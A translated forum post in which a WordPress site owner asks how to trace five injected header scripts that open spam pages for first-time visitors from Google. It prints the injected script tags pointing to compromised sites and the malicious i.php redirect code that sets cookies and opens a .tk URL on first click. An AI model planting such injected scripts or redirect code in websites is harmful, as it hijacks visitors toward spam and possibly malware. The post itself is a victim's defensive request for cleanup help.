javascript - 如何找到标题中包含的未知脚本的来源？

问题描述

运行 Wordpress 的网站在新用户首次点击时会在新选项卡中打开垃圾邮件网站。如果您直接访问该 URL 或之前访问过该站点，则不会触发恶意软件。例如，如果您是新用户并从 Google 搜索结果导航到该页面，那么您将被重定向（通过新选项卡）到随机垃圾邮件页面。URL 似乎每次都不同。

到目前为止，我已经尝试了不同的恶意软件扫描程序（Sucuri 和 Wordfence 等），但没有任何结果。我尝试禁用所有插件、更改主题、更新 Wordpress。尝试禁用预取。恶意软件仍然存在。

我发现有五个脚本以某种方式包含在标题中。通过 Google 结果以隐身模式导航到网站时查看源代码，我可以看到存在的参考资料。头文件中加载的脚本：

<script type='text/javascript' src='https://longtailmagic.com/domain/i.php' id='hello_newscript0-js'></script>
<script type='text/javascript' src='https://jadsupport.com/includes/i.php' id='hello_newscript1-js'></script>
<script type='text/javascript' src='https://magaliefonteneau.com/wp-content/i.php' id='hello_newscript2-js'></script>
<script type='text/javascript' src='http://futuracp.com/images/i.php' id='hello_newscript3-js'></script>
<script type='text/javascript' src='http://casualwoodcreations.com/images/i.php' id='hello_newscript4-js'></script>

所有五个似乎都是运行 Wordpress 的随机页面，提供相同的恶意脚本。查看事件侦听器，我i.php:7在click.

检查i.php从其中一个站点提供的服务，它具有以下内容：

localStorage.setItem('test', 'testValue');

if ((localStorage.getItem('test') !== null) &&  (localStorage.getItem('click') == null)){
    
    var click_r = false;
    document.addEventListener("click", function(){ 
    
    if(click_r == false){
    var date = new Date();date.setTime(date.getTime()+(100*24*60*60*1000));
    document.cookie = "a=a; expires=" + date.toGMTString();
    localStorage.setItem('click', 'click');
    window.open("http://etbetrehyheartling.tk/index/?8131599557550");
    click_r = true;
    }
    });
}

有没有办法找到这些脚本包含的生成源并添加到标题中？任务是摆脱脚本引用，这似乎是摆脱将新用户重定向到垃圾邮件站点的恶意软件的方法。我尝试过使用不同关键字的字符串定位器来更接近源，但到目前为止还没有运气。

标签： javascriptwordpresssecurityspammalware